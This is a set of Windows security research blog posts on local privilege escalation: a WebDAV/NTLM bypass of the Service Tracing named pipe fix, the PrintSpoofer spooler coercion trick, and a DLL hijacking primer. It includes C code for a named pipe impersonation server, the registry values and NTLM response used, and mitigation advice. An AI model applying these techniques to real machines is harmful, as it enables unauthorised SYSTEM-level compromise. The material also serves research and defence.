This time, the 100 calls took less than 4 seconds to complete. This wasn’t enough for calculating relevant stats so I ran the same test with 10,000 calls this time.

Here is the result of this second test.

DESCRIPTION TIME FILE SIZE # OF CALLS
Raw data for 10,000 calls 363s (6m 2s) 2,441,120 bytes 10,000
Estimated time to reach the target file size 2,495s (41m 35s) 16,777,216 bytes 68,728

With this slight adjustment, the overall operation would take around 40 minutes, instead of more than 22 hours with the previous command. This would therefore drastically reduce the amount of time required to fill the log file. It should also be noted that these values correspond to the worst-case scenario, where the log file would initially be empty.

I considered that this value was acceptable so I implemented this trick in a Proof-of-Concept. Here is a screenshot showing the result.

Starting from an empty log file, the PoC took around 38 minutes to complete, which is very close to the estimation I had made previously.

As a side note, if you paid attention to the last screenshot, you probably noticed that I specified C:\ProgramData\Microsoft\Windows\WER as the target directory to delete. I didn’t choose this path randomly. I chose this one because, once this folder has been removed, you can get code execution as NT AUTHORITY\SYSTEM as explained by @jonaslyk in this post: From directory deletion to SYSTEM shell.

Conclusion

This is probably the last blog post in which I write about this kind of privileged file operation abuse. In an email sent to all vulnerability researchers, Microsoft announced that they changed the scope of their bounty. Therefore, such exploit is no longer eligible. This decision is justified by the fact that a generic patch is in development and will address this entire bug class.

I have to say that this decision sounds a bit premature. It would be understandable if this patch was already implemented in the latest Insider Preview build of Windows 10 but that’s not the case. I would assume that this is more of an economic decision than a pure technical matter as such bounty program probably represents a cost of hundreds of thousands of dollars per month.

Links & Resources

Chimichurri Reloaded - Giving a Second Life to a 10-year old Windows Vulnerability

This is a kind of follow-up to my last post, in which I discussed a technique that can be used for elevating privileges to SYSTEM when you have impersonation capabilities. In the last part, I explained how this type of vulnerability could be fixed and I even illustrated it with a concrete example of a workaround that was implemented by Microsoft 10 years ago in the context of the Service Tracing feature. Though, I also insinuated that this security measure could be bypassed. So, let’s see how we can make a 10-year old vulnerability great again…

What Are We Talking About?

I won’t assume that you’ve read all of my previous blog posts, so I’ll start things off with a brief recap.

Around 10 years ago, Cesar Cerrudo (@cesarcer) found that it was possible to use the Service Tracing feature of Windows as a way of capturing a SYSTEM token using a named pipe. As long as you had the SeImpersonatePrivilege privilege, you could then execute arbitrary code in the security context of this user. Back then, this was acknowledged by Microsoft as a vulnerability and it got the CVE ID CVE-2010-2554.

Let’s take the Service Tracing key corresponding to the RASMAN service as an example. The idea is simple, you first have to start a local named pipe server. Then, instead of setting a simple directory path as the target log file’s folder in the registry, you can specify the path of this named pipe.

In this example, \\localhost\pipe\tracing is set as the target directory. Then, as soon as EnableFileTracing is set to 1, the service will try to open its log file using the path \\localhost\pipe\tracing\RASMAN.LOG. So, if we create a named pipe with the name \\.\pipe\tracing\RASMAN.LOG, we will receive a connection and we can impersonate the service account by calling the ImpersonateNamedPipeClient function. Since RASMAN is running as NT AUTHORITY\SYSTEM, we eventually get a SYSTEM impersonation token.

Note: depending on the version of Windows, the log file open event sometimes doesn’t occur immediately when EnableFileTracing is set to 1. One way to trigger it reliably is to start the service. Note that the RASMAN service can be started by low-privileged users via the Service Control Manager (SCM).

Of course, if you try to do this on a version of Windows that is less than 10 years old, you’ll run into the same problem that is shown on the above screenshot. If you try to execute arbitrary code in the security context of the impersonated user, you’ll get the error code 1346, i.e. Either a required impersonation level was not provided, or the provided impersonation level is invalid.. You could also get the error code 5, i.e. Access denied. It’s the result of a counter-measure that was enforced by Microsoft in this particular Windows feature.

I detailed this security update in my previous post. To put it simple, the flags SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION are now specified in the CreateFile function call, which is responsible for getting the initial handle on the target log file. Because of these flags, the resulting impersonation level of the token we get is now SecurityIdentification (level 2/4). Though, SecurityImpersonation (level 3/4) or SecurityDelegation (level 4/4) is required in order to fully impersonate the user.

Note: as a side note, you probably noticed that the message Unknown error 0x80070542 is printed on the command prompt instead of the actual Win32 error message. The reason for this is that I try to get the error message correspondnig to the error code while impersonating the user. Because of the limited impersonation level, this code/message lookup fails.

Does it mean we are screwed? Short answer, yes, we are because the token we get is kinda useless. Long answer, well, you’ll have to read the next parts… :wink:

A UNC Path?

In the previous part, we saw that if we specify the name of a pipe as the log file directory, we do get an impersonation token but we cannot use it to create a new process. OK but did you notice how I glossed over an important detail here? How did I specify the name of a pipe in the first place?

First you need to know how the final log file path is calculated. That’s trivial, it’s a simple string concatenation: <DIRECTORY>\<SERVICE_NAME>.LOG, where <DIRECTORY> is read from the registry (FileDirectory value). So, if you specify C:\Temp as the output directory for a service called Bar, the service will use C:\Temp\BAR.LOG as the path of its log file.

In this exploit though, we specified the name of a pipe rather than a regular directory, by using a UNC path. On Windows, there are many ways to specify a path and this is only one of them but this post isn’t about that. Actually, UNC (Universal Naming Convention) is exactly what we need, but we need to use it a slightly differently.

UNC paths are commonly used for accessing remote shares on a local network. For example, if you want to access the folder BAR on the volume FOO of the machine DUMMY, you’ll use the UNC path \\DUMMY\FOO\BAR. In this case, the client machine connects to the TCP port 445 of the target server and uses the SMB protocol to exchange data.

There is a slight variant of this example that you probably already know of. You can use a path such as \\DUMMY@4444\FOO\BAR in order to access a remote share on an arbitrary port (4444 in this example) rather than the default TCP port 445. Although the difference in the path is small, the implications are huge. The most obvious one is that the SMB protocol is no longer used. Instead, the client uses an extended version of the HTTP protocol, which is called WebDAV (Web Distributed Authoring and Versioning).

On Windows, WebDAV is handled by the WebClient service. If you check the description of this service, you can read the following:

Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these functions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start.

Although, WebDAV uses a completely different protocol, one thing remains: authentication. So, what if we create a local WebDAV server and use such a path as the output directory?

Hello, I’m Officer Dave. May I See Your ID, Please?

First things first, we need to edit the regsitry and change the value of FileDirectory. We will set \\127.0.0.1@4444\tracing instead of a named pipe path.

Thanks to netcat, we can easily open a socket and listen on the local TCP port 4444. After enabling the service tracing, here is what we get:

Interesting! We get an HTTP OPTIONS request. The User-Agent header also shows us that this is a WebDAV request but, apart from that, there’s not much to learn. Though, now that we know that the service is willing to communicate using WebDAV, we should reply and send an authentication request. :wink:

To do so, I created a simple PowerShell script that uses a System.Net.Sockets.TcpListener object to listen on an arbitrary port and send a hardcoded HTTP response to the first client that connects to the socket. Here is the content of the HTTP response we will send to the client:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: NTLM

If you are familiar with web application pentesting, there is a high chance you’ve encountered the WWW-Authenticate header with the value Basic quite a lot (e.g.: Apache htpasswd), but not necessarily NTLM. This value allows us to indicate that the client must authenticate using the 3-way NTLM authentication scheme. By the way, if you feel like you need to fill some gaps about NTLM, I highly recommend you to read this excellent post about NTLM relaying by @HackAndDo. These blog posts are always very well written. :slightly_smiling_face:

With the script running in the background, we get the following result:

At first glance, it looks like the service accepted to initiate the NTLM authentication and sent us its NTLM NEGOTIATE request. This is confirmed by the output of Wireshark.

This is a good start, we are definitely on the right track but there is one last thing to verify. This one last thing will decide whether all of this was for nothing or not: the Negotiate Identify flag.

The NTLM authentication protocol documentation is quite exhaustive. You can see the detailed structure of each message that is used in the protocol. In particular, this section explains how the NegotiateFlags value is calculated in the NEGOTIATE message. About the Identify flag, you can read:

So, if this bit is set, the client tells the server that it can request a token with an impersonation level of SecurityIdentification only. In other words, if this flag is set, we are back to square one. We won’t be able to get a proper impersonation token.

Thanks to the amazing Wireshark dissectors, we can easily check the value of this flag.

The Identify flag is not set!!! :tada:

This means that we can bypass the patch and get an impersonation token that we can use to execute arbitrary code in the context of NT AUTHORITY\SYSTEM. What we need to do next is simply complete the NTLM authentication thanks to an NTLM negotiator. This will allow us to transform this raw NTLM exchange into a token that we can then use if we have impersonation privileges. Though, I won’t talk about this here because this subject is already covered by the *Potato exploits.

The below screenshot shows the result of the PoC I implemented.

A Quick Bug Analysis

There is still some work to do in order to fully understand why this trick works. I won’t write a detailed analysis here but I’ll share some insight.

First, there is one detail that you may have noticed while reading the previous part. The service is requesting the resource /tracing rather than /tracing/RASMAN.LOG. Weird, isn’t it? :thinking:

Since we specified \\127.0.0.1@4444\tracing as the directory path, you’d expect that the service uses the path \\127.0.0.1@4444\tracing\RASMAN.LOG and therefore requests /tracing/RASMAN.LOG. Of course, there is an explanation. If you take a quick look at the code of the TraceCreateClientFile function in rtutils.dll, you’ll see that, before trying to open the log file, it begins by checking whether the directory specified in the FileDirectory value exists.

On the below screenshot, you can see that if CreateDirectory succeeds, i.e. if the target directory didn’t exist and was successfully created, then the function immediately returns. In this case, the log file is never opened and you’d have to disable the tracing and re-enable it. In other words, for the TraceCreateClientFile function to complete, this CreateDirectory call must fail.

The first HTTP request we receive on our WebDAV server is actually the result of this initial check. Moreover, CreateDirectory is nothing more than a user-friendly wrapper for the NtCreateFile function. Yes, everything is a file, even on Windows! :upside_down_face:

This CreateDirectory function is very convenient but there is a problem: it doesn’t allow you to specify custom flags, such as the ones used to restrict the impersonation level of the token. This explains why I was able to get a proper impersonation token using this trick.

BOOL CreateDirectoryW(
  LPCWSTR               lpPathName,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes
);

Does it mean that I was lucky? What would happen if the server actually requested /tracing/RASMAN.LOG via the hardened CreateFile function call? To answer this question, I compiled the following code:

HANDLE hFile = CreateFile(
    argv[1], 
    GENERIC_READ | GENERIC_WRITE, 
    0, 
    NULL, 
    OPEN_EXISTING, 
    SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, // <- Limited token
    NULL);
if (hFile)
{
    wprintf(L"CreateFile OK\n");
    CloseHandle(hFile);
}
else
{
    PrintLastErrorAsText(L"CreateFile");
}

Then, instead of waiting for the RASMAN service to connect, I manually triggered the WebDAV access using this dummy application as a low-privileged user. And… here is the result:

Although the flags SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION are specified in the CreateFile function call, we still get a token with the impersonation level SecurityImpersonation! As a conclusion, yes, I was a bit lucky but it’s not that simple as it turns out the WebClient service is also flawed.

Conclusion

In this post, I explained how it is possible to easily bypass a security patch that was originally implemented to prevent a malicious server application from getting a usable impersonation token by leveraging the Service Tracing feature. Though I have to give part of the credit to this MS16-075 exploit that was written by a colleague of mine a couple of years ago. It served as a great inspiration.

I don’t know yet if I’ll publish this as a tool or not. There is still some work to do in order to make it a usable tool because of the many Service Tracing keys that can be triggered. Moreover, there is still a major prerequisite for this trick to work: the WebClient service must be installed and enabled. Although this is the default on Workstations, it’s not the case for Servers. On a server, you would need to install/enable the WebDAV component as an additional feature.

Lastly, I didn’t take the time to push further the investigation. There is a lot more work to do in order to understand why the request that is coming from the WebClient service doesn’t take the SECURITY_IDENTIFICATION flag of the CreateFile call into consideration. In my opinion, this is a vulnerability but, who cares? :pensive:

Links & Resources

PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019

Over the last few years, tools such as RottenPotato, RottenPotatoNG or Juicy Potato have made the exploitation of impersonation privileges on Windows very popular among the offensive security community. Though, recent changes to the operating system have intentionally or unintentionally reduced the power of these techniques on Windows 10 and Server 2016/2019. Today, I want to introduce a new tool that will allow pentesters to easily leverage these privileges again.

Foreword

Please note that I used the term “new tool” and not “new technique”. If you read this article in the hope of learning a new leet technique, you will be disappointed. In fact, I’m going to discuss two very well-known techniques that can be combined together in order to achieve privilege escalation from LOCAL SERVICE or NETWORK SERVICE to SYSTEM. To my knowledge, I think there hasn’t been any public mention about using this particular trick in this context but, of course, I might be wrong. :roll_eyes:

Note: I developed the tool and started preparing this blog post prior to the publication of this blog post by James Forshaw: Sharing a Logon Session a Little Too Much. I could have chosen to cancel the publication of my post but I eventually realized that it was still worth it. Please keep this in mind as you read this post.

Impersonation Privileges

I want to start things off with this quote from @decoder_it: “if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM”. That’s a deliberately provocative shortcut obviously, but it’s not far from the truth. :smile:

These two privileges are very powerful indeed. They allow you to run code or even create a new process in the context of another user. To do so, you can call CreateProcessWithToken() if you have SeImpersonatePrivilege or CreateProcessAsUser() if you have SeAssignPrimaryTokenPrivilege.

Before talking about these two particular functions, I want to quickly remind you what the standard CreateProcess() function looks like:

The first two parameters allow you to specify the application or the command line you want to execute. Then, a lot of settings can be specified in order to customize the environment and the security context of the child process. Finally, the last parameter is a reference to a PROCESS_INFORMATION structure which will be returned by the function upon success. It contains the handles to the target process and thread.

Let’s take a look at CreateProcessWithToken() and CreateProcessAsUser() now:

As you can see, they are not much different than the standard CreateProcess() function. However, they both require a handle to a token. According to the documentation, hToken must be “a handle to the primary token that represents a user”. Further, you can read “To get a primary token that represents the specified user, […] you can call the DuplicateTokenEx function to convert an impersonation token into a primary token. This allows a server application that is impersonating a client to create a process that has the security context of the client.

Of course, the documenation doesn’t tell you how to get this token in the first place because that’s not the responsibility of these two functions. Though, it tells you in what type of scenario they are used. These functions allow a server application to create a process in the security context of a client. This is indeed a very common practice for Windows services that expose RPC/COM interfaces for example. Whenever you invoke an RPC function exposed by a service running as a highly privileged account, this service might call RpcImpersonateClient() in order to run some code in your security context, thus lowering the risk of privilege escalation vulnerablities.

As a summary, provided that we have the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege privilege, we can create a process in the security context of another user. What we need though is a token for this user. The question is: how to capture such a token with a custom server application?

Impersonating a User with a Named Pipe

Exploit tools of the Potato family are all based on the same idea: relaying a network authentication from a loopback TCP endpoint to an NTLM negotiator. To do so, they trick the NT AUTHORITY\SYSTEM account into connecting and authenticating to an RPC server they control by leveraging some peculiarities of the IStorage COM interface.

During the authentication process, all the messages are relayed between the client - the SYSTEM account here - and a local NTLM negotiator. This negotiator is just a combination of several Windows API calls such as AcquireCredentialsHandle() and AcceptSecurityContext() which interact with the lsass process through ALPC. In the end, if all goes well, you get the much desired SYSTEM token.

Unfortunately, due to some core changes, this technique doesn’t work anymore on Windows 10 because the underlying COM connection from the target service to the “Storage” is now allowed only on TCP port 135.

Note: as mentionned by @decoder_it in this blog post, this restriction can actually be bypassed but the resulting token cannot be used for impersonation.

Now, what are the alternatives? RPC isn’t the only protocol that can be used in such a relaying scenario, but I won’t discuss this here. Instead, I’ll discuss an old school technique involving pipes. As I said in the Foreword, there is nothing groundbreaking about this but, as always, I like to present things my own way, so I’ll refresh some basic knowledge even though that may sound trivial for most people.

According to the documentation, “a pipe is a section of shared memory that processes use for communication. The process that creates a pipe is the pipe server. A process that connects to a pipe is a pipe client. One process writes information to the pipe, then the other process reads the information from the pipe.” In other words, pipes are one of the many ways of achieving Inter-Process Communications (IPC) on Windows, just like RPC, COM or sockets for example.

Pipes can be of two types:

  • Anonymous pipes - Anonymous pipes typically transfer data between a parent process and a child process. They are usually used to redirect standard input and output between a child process and its parent.
  • Named pipes - Named pipes on the other hand can transfer data between unrelated processes, provided that the permissions of the pipe grant appropriate access to the client process.

In the first part, I mentionned the RpcImpersonateClient() function. It can be used by an RPC server to impersonate an RPC client. It turns out that Named pipes offer the same capability with the ImpersonateNamedPipeClient() function. So, let’s do some named pipe impersonation! :sunglasses:

I realize that what I’ve explained so far is a bit too theoretical. What we need is a concrete example so, let’s consider the following code. Explanations will follow.

HANDLE hPipe = INVALID_HANDLE_VALUE;
LPWSTR pwszPipeName = argv[1];
SECURITY_DESCRIPTOR sd = { 0 };
SECURITY_ATTRIBUTES sa = { 0 };
HANDLE hToken = INVALID_HANDLE_VALUE;

if (!InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION))
{
    wprintf(L"InitializeSecurityDescriptor() failed. Error: %d - ", GetLastError());
    PrintLastErrorAsText(GetLastError());
    return -1;
}

if (!ConvertStringSecurityDescriptorToSecurityDescriptor(L"D:(A;OICI;GA;;;WD)", SDDL_REVISION_1, &((&sa)->lpSecurityDescriptor), NULL))
{
    wprintf(L"ConvertStringSecurityDescriptorToSecurityDescriptor() failed. Error: %d - ", GetLastError());
    PrintLastErrorAsText(GetLastError());
    return -1;
}

if ((hPipe = CreateNamedPipe(pwszPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE | PIPE_WAIT, 10, 2048, 2048, 0, &sa)) != INVALID_HANDLE_VALUE)
{
    wprintf(L"[*] Named pipe '%ls' listening...\n", pwszPipeName);
    ConnectNamedPipe(hPipe, NULL);
    wprintf(L"[+] A client connected!\n");

    if (ImpersonateNamedPipeClient(hPipe)) {

        if (OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken)) {

            PrintTokenUserSidAndName(hToken);
            PrintTokenImpersonationLevel(hToken);
            PrintTokenType(hToken);

            DoSomethingAsImpersonatedUser();

            CloseHandle(hToken);
        }
        else
        {
            wprintf(L"OpenThreadToken() failed. Error = %d - ", GetLastError());
            PrintLastErrorAsText(GetLastError());
        }
    }
    else
    {
        wprintf(L"ImpersonateNamedPipeClient() failed. Error = %d - ", GetLastError());
        PrintLastErrorAsText(GetLastError());
    }
    
    CloseHandle(hPipe);
}
else
{
    wprintf(L"CreateNamedPipe() failed. Error: %d - ", GetLastError());
    PrintLastErrorAsText(GetLastError());
}

The first two function calls are used to create a custom Security Descriptor that will be applied to the pipe. These functions are not specific to pipes and they don’t play a role in impersonation but I have to mention them briefly. Indeed, pipes are securable objects just like files or registry keys. This means that if you don’t set the appropriate permissions on the named pipe you create, clients running with a different identity might not be able to access it at all. Here, I chose the easy way by granting Everyone generic access to the pipe.

Here are the required functions for impersonating a client through a named pipe:

  • CreateNamedPipe() - The name speaks for itself. As a server application, this function allows you to create a named pipe with a name of the form \\.\pipe\PIPE_NAME.
  • ConnectNamedPipe() - Once the pipe is created, this function is used for accepting connections. Unless specified otherwise, the call is synchronous by default, so the thread is paused untill a client connects.
  • ImpersonateNamedPipeClient() - This is where the magic happens!

Of course, some rules apply to the use of this last function. According to the documentation, here are two of the four cases where impersonation is allowed:

  • The authenticated identity is same as the caller - In other words, you can impersonate yourself. Surprisingly, there are some exploitation scenarios where this is actually useful.
  • The caller has the SeImpersonatePrivilege privilege - That’s us! :slightly_smiling_face:

Just one last thing before seeing this code in action. I implemented a few functions that will print some information about the client’s token and I also implemented a function that I called DoSomethingAsImpersonatedUser(). The purpose of this function is to check whether we can actually execute code in the context of the client. This will be particularly relevant for the last part of this post.

PrintTokenUserSidAndName(hToken);
PrintTokenImpersonationLevel(hToken);
PrintTokenType(hToken);
DoSomethingAsImpersonatedUser();

And here we go! After starting my server application as a local administrator (administrators have the SeImpersonatePrivilege prvivilege by default), I use a normal user account and try to write to the named pipe.

Once the client is connected, you get an impersonation token with an impersonation level of 2, i.e. SecurityImpersonation. In addition, DoSomethingAsImpersonatedUser() returned successfully, which means that we can run arbitrary code in the security context of this client. :ok_hand:

Note: perhaps you noticed that I used the path \\localhost\pipe\foo123, instead of \\.\pipe\foo123, which is the real name of the pipe. For the impersonation to succeed, the server must first read data from the pipe. If the client opens the path using \\.\pipe\foo123 as the pipe’s path, no data is written and ImpersonateNamedPipeClient() fails. On the other hand, if the client opens the pipe using \\HOSTNAME\pipe\foo123, ImpersonateNamedPipeClient() succeeds. Don’t ask me why, I have no idea…

To summarize, we know that in order to create a process in the context of another user we need a token. Then, we saw that we could get that token thanks to a server application which leverages named pipe impersonation. So far, that’s common knowledge but the question is: how can we trick the NT AUTHORITY\SYSTEM account into connecting to our named pipe?

Getting a SYSTEM Token

At then end of last year (2019-12-06), @decoder_it published a blog post entitled We thought they were potatoes but they were beans (from Service Account to SYSTEM again), where he demonstrated how the Background Intelligent Transfer Service (BITS) could be leveraged to get a SYSTEM token in a local NTLM relaying scenario which is quite similar to the technique used in the Potato exploits. @decoder_it and @splinter_code implemented this technique in a tool called RogueWinRM, which you can find here.

Although this method is perfectly valid, it comes with a significant drawback. It relies on a WinRM request that is performed by BITS on the local TCP port 5985, the default WinRM port. If this port is available, you can create a malicious WinRM server that will reply to this request and thus capture the credentials of the SYSTEM account. Although the WinRM service is usually stopped on workstations, it is quite the opposite when it comes to server instances, so it wouldn’t be exploitable in this case.

When the results of this research and the associated PoC came out, I was also searching for a generic way of achieving the same objective: capturing a SYSTEM token via a local NTLM relay. Although that wasn’t my top priority, I did find a similar trick but, in the end, it had the same limitations. It wouldn’t work on most installations of Windows Server, so I left it aside. And then, a few months later, during a chat, @jonaslyk gave me the answer: the Printer Bug (with a slight twist).

Does it ring a bell? :wink:

The Printer Bug was introduced as a tool called SpoolSample by Lee Christensen (a.k.a. @tifkin_). According to the description of the tool on GitHub, its purpose is to “coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface”. The idea behind this tool is to provide a simple and effective mechanism for exploiting Active Directory environments, by tricking a Domain Controller into connecting back to a system configured with unconstrained delegation. Based on this simple concept, an attacker can compromise another forest in a 2-way trust for example, but I digress…

This exploit is based on a single RPC call to a function exposed by the Print Spooler service.

DWORD RpcRemoteFindFirstPrinterChangeNotificationEx( 
    /* [in] */ PRINTER_HANDLE hPrinter,
    /* [in] */ DWORD fdwFlags,
    /* [in] */ DWORD fdwOptions,
    /* [unique][string][in] */ wchar_t *pszLocalMachine,
    /* [in] */ DWORD dwPrinterLocal,
    /* [unique][in] */ RPC_V2_NOTIFY_OPTIONS *pOptions)

According to the documentation, this function creates a remote change notification object that monitors changes to printer objects and sends change notifications to a print client using either RpcRouterReplyPrinter or RpcRouterReplyPrinterEx.

Do you know how these notifications are sent to the client? The answer is “via RPC… over a named pipe”. Indeed, the RPC interfaces of the Print Spooler service are exposed over a named pipe: \\.\pipe\spoolss. You can see the pattern now? :slightly_smiling_face:

Let’s try a few things with the PoC provided by Lee Christensen.

The tool was originally designed to let you specify two server names: the one to connect to (a Domain Controller) and the one you control, for capturing the authentication. Here we want to connect to the local machine and receive the notification on the local machine as well. The problem is that if we do that, the notification is sent to \\DESKTOP-RTFONKM\pipe\spoolss. This pipe is controlled by NT AUTHORITY\SYSTEM and we cannot create our own pipe with the same name, that doesn’t make any sense. On the other hand, if we specify an arbitrary path and append an arbitrary string, the call just fails because of a path validation check.

Though, I did say that there was a twist. Here is the second trick that @jonaslyk shared with me. If the hostname contains a /, it will pass the path validation checks but, when calculating the path of the named pipe to connect to, normalization will transform it into a \. This way, we can partially control the path used by the server! :open_mouth:

See? The final path that is being used by the service is now \\DESKTOP-RTFONKM\foo123\pipe\spoolss. Of course, this is not a valid path for a named pipe, but with a slight adjustment, we can make it a valid one. If we specify the value \\DESKTOP-RTFONKM/pipe/foo123 in our RPC call, the service will transform it into \\DESKTOP-RTFONKM\pipe\foo123\pipe\spoolss, which is perfectly valid.

Thanks to our server application, we can quicky test this scenario. The following screenshot shows that we do get a connection and that we can then successfully impersonate NT AUTHORITY\SYSTEM.

I implemented this trick in a tool I called PrintSpoofer. As a prerequisite, the only required privilege is SeImpersonatePrivilege. I tested it successfully on default installations of Windows 8.1, Windows Server 2012 R2, Windows 10 and Windows Server 2019. It might work as well on older versions of Windows under certain circumstances.

The screenshot below shows the execution of the tool in a real-life scenario. A shell is opened as a subprocess of the CDPSvc service on Windows Server 2019. This concrete example is particularly interesting because this service runs as NT AUTHORITY\LOCAL SERVICE with only two privileges: SeChangeNotifyPrivilege and SeImpersonatePrivilege.

How to Prevent Named Pipe Impersonation

First of all, I don’t know if it’s common knowledge but named pipe impersonation can be prevented. As a client, you can specify that you don’t want to be impersonated or, at least, that you don’t want the server to run code in your security context. In fact, there is a place which I already discussed in a previous post where this protection was implemented by Microsoft as a fix for a “vulnerability”.

But before we discuss this, we need a dummy client application for communicating with our named pipe server. This will help me illustrate what I’m going to explain. Named pipes are part of the filesystem so how do we connect to a pipe? The answer is “with a simple CreateFile() function call”.

HANDLE hFile = CreateFile(
    argv[1],                        // pipe name
    GENERIC_READ | GENERIC_WRITE,   // read and write access 
    0,                              // no sharing 
    NULL,                           // default security attributes
    OPEN_EXISTING,                  // opens existing pipe 
    0,                              // default attributes 
    NULL                            // no template file 
);

if (hFile != INVALID_HANDLE_VALUE) {
    wprintf(L"[+] CreateFile() OK\n");
    CloseHandle(hFile);
} else {
    wprintf(L"[-] CreateFile() failed. Error: %d - ", GetLastError());
}

If we run this code, we can see that we get a connection on our named pipe and the client is successfully impersonated. There is nothing surprising because I called CreateFile() with default values.

Though, in the documentation of the CreateFile() function, we can see that a lot of attributes can be specified. In particular, if the SECURITY_SQOS_PRESENT flag is set, we can control the impersonation level of our token.

So, in the source code of the dummy client application, I modified the CreateFile() function call as follows. The value SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION is now specified as part of the dwFlagsAndAttributes parameter.

HANDLE hFile = CreateFile(
    argv[1],                        // pipe name
    GENERIC_READ | GENERIC_WRITE,   // read and write access 
    0,                              // no sharing 
    NULL,                           // default security attributes
    OPEN_EXISTING,                  // opens existing pipe 
    SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, // impersonation level: SecurityIdentification
    NULL                            // no template file 
);

We still get some info about the token but, this time, if we try to execute code in the security context of the client, an error is returned: Either a required impersonation level was not provided, or the provided impersonation level is invalid. Indeed, as highlighted on the screenshot, the impersonation level of the token is now SecurityIdentification which prevents our malicious server application from fully impersonating the client.

That being said, that’s still a bit theoretical but, I did mention that Microsoft implemented this protection as a fix for a vulnerability. In a previous post, I discussed a vulnerability in the Service Tracing feature. As a reminder, this feature allows you to collect some debug information about a particular service simply by editing a registry key in the HKLM hive. Any Authenticated User can specify the destination folder of the log file in the FileDirectory value. For example, if you specify C:\test, the debugged program will write to C:\test\MODULE.log and this operation is performed in the security context of the target application or service.

Since you have control over the file path, nothing prevents you from using the name of a pipe as a path for the target directory. Well, that’s exactly what the CVE-2010-2554 or the MS10-059 bulletin is about.

This vulnerability was reported to Microsoft by @cesarcer. He implemented this in a tool called Chimichurri. I didn’t find the original source of the code but you can find it in this repo. The idea is to trick a service running as NT AUTHORITY\SYSTEM into connecting to a malicious named pipe and thus capture its token. Provided that you had the SeImpersonatePrivilege, this method worked perfectly well.

Let’s see what happens now if we try to do the same thing on Windows 10:

Although we have the SeImpersonatePrivilege privilege, we get the exact same error when we try to execute code in the context of the SYSTEM account. If we take a look at the CreateFile() call used in rtutils.dll to open the log file, we can see the following:

The hexadecimal value 0x110080 is actually SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION | FILE_ATTRIBUTE_NORMAL.

Note: it should be noted that this protection isn’t bulletproof though. It just makes things harder for an attacker.

As a conclusion, Microsoft treated this case as a regular vulnerability, assigned it a CVE ID and even wrote a detailed security bulletin. Though, times have changed a lot! Nowadays, if you try to report such a vulnerability, they will reply that elevation of privilege by leveraging impersonation privileges is an expected behavior. They probably realized that it’s a fight they cannot win, at least not this way. Like James Forshaw once said about this kind of exploit on Twitter: “they’d argue that you might as well be SYSTEM if you’ve got impersonate privilege as that’s kind of the point. They can make it harder to get a suitable token but it’s just a game of whack-a-mole as there will always be something else you can exploit” (source).

Conclusion

In this post, I explained how the impersonation privileges could be leveraged on Windows 10 in order to execute code in the context of the SYSTEM account. A lot of Windows services which run as LOCAL/NETWORK SERVICE have these capabilities. Though, sometimes they don’t. In this case, you can still recover impersonation privileges either using this tool - FullPowers - or with the method which was illustrated by James Forshaw in this blog post: Sharing a Logon Session a Little Too Much.

Last but not least, I want to say a special thank you to @jonaslyk. Over the past few weeks, I had the chance to chat with him on multiple occasions and, I have to say that he’s always willing to share and explain some cool tips and tricks. These conversations sometimes even turn into very productive brainstorming sessions.

Links & Resources

Windows DLL Hijacking (Hopefully) Clarified

Whenever a “new” DLL hijacking / planting trick is posted on Twitter, it generates a lot of comments. “It’s not a vulnerability!” or “There is a lot of hijackable DLLs on Windows…” are the most common reactions. Though, people often don’t really speak about the same thing, hence the overall confusion which leads us nowhere. I don’t pretend to know the ultimate truth but I felt the need to write this post in order to hopefully clarify some points.

Introduction

Whenever I write about something that involves DLL hijacking (e.g.: NetMan DLL Hijacking), I assume that it’s common knowledge and that we are all on the same page. It turns out that it’s a big mistake, for multiple reasons! First, DLL hijacking is just a core concept and, in practice, there are some variants. Therefore, whether you are a pentester, a security researcher or a system administrator, your own conception of it may differ from someone else’s. And then, there is this recurring debate: is it a vulnerability? Before giving a factual answer to this question, I’ll first remind what DLL hijacking is about. Then I’ll illustrate two of its variants with real-life examples, depending on what you are trying to achieve. Finally, I’ll try to give some insight into how you can lower the risk of DLL hijacking.

DLL Hijacking: What are we talking about?

Dynamically compiled Win32 executables use functions which are exported by built-in or third-party Dynamic Link Libraries (DLL). There are two main ways to achieve this:

  • At link time - When the program is compiled, an import table is written into the headers of the Portable Executable (PE). To put it simple, it keeps track of which function needs to be imported from which DLL. Therefore, whenever the program is executed, the linker knows what to do and loads all the required libraries transparently on your behalf.
  • At runtime - Sometimes, you need to or want to import a library at runtime. At this point, the linker has already done its part of the job, so if you want to do so you’ll have to take care of a few things yourself. In particular, you can call LoadLibrary() or LoadLibraryEx() from the Windows API.

Note: in this post, I’ll consider only Win32 applications. Although they use the same extension, DLLs in the context of .NET applications have a completely different meaning so I won’t talk about them here. I don’t want to add to the confusion.

According to the documentation, the prototype of these two functions is as follows:

HMODULE LoadLibrary(LPCSTR lpLibFileName);
HMODULE LoadLibraryEx(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);

The main argument - lpLibFileName - is the path of the library file you want to load. Though, evaluating the full path of the file at runtime requires some work that we are not always willing to do, especially when the system can retrieve this path by itself. For example, instead of writing LoadLibrary("C:\Windows\System32\mylib.dll"), you could just write LoadLibrary("mylib.dll") and thus let the system find the DLL. This approach makes a lot of sense for third-party applications because they don’t necessarily know this path beforehand.

But then, if you don’t specify the full path of the library you want to load, how does the system know where to find it? The answer is simple, it uses a predefined search order, which is illustrated on the following diagram.

The locations in the “pre-search” are highlighted in green because they are safe (from a privilege escalation perspective). If the name of the DLL doesn’t correspond to a DLL which is already loaded in memory or if it’s not a known DLL, the actual search begins. The program will first try to load it from the application’s directory. If it succeeds, the search stops there otherwise it continues with the C:\Windows\System32 folder and so on…

